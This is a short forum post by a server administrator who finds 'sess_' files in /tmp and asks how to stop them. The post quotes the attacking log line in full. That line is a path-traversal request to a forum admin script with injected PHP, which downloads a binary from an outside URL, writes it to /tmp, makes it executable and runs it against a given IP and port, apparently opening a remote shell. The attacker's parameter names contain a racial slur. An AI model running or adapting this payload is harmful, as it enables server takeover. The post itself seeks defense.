sess_ hack file!
from 5-6 days i have found a lot of sess_ files in the tmp directory on my server, checking the log i have found that it are uploaded with a php file of a forum
/forum/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=49745976276f39b54dce84bbd018cb2e&niggaip=82.50.122.240&niggaport=80&nigga=$a=fopen(\"http://www.apaw.ca/images/nc4hk.swf\",\"r\");$b=\"\";while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);$a=fopen(\"/tmp/.sess_\",\"w\");fwrite($a,$b);fclose($a);chmod(\"/tmp/.sess_\",0777);passthru(\"/tmp/.sess_%20\".$_REQUEST[niggaip].\"%20\".$_REQUEST[niggaport].\"%20\")
is there any appz to stop this files? i have already secure tmp directory
